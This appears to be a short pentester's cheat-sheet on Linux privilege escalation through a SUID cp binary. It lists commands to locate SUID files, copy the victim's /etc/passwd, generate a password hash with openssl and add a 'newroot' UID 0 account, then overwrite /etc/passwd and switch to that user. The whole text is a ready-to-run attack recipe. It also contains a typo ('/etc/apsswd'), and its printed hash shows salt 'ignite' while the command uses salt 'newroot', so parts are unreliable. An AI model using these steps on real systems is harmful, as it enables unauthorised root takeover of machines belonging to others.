CP SUID
- check SUID find / -perm -u=s -type f 2>/dev/null
- If cp is there , go ahead
- On victim, cat /etc/apsswd ,
- on attacker, nano passwd , and paste data from victim
- create salt value of password pass123 for newroot user
openssl passwd -1 -salt newroot pass123
value = $1$ignite$3eTbJm98O9Hz.k1NTdNxe1
- add a new line in passwd file
newroot:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash
- Transfer file to victim
- cp passwd /etc/passwd
- su newroot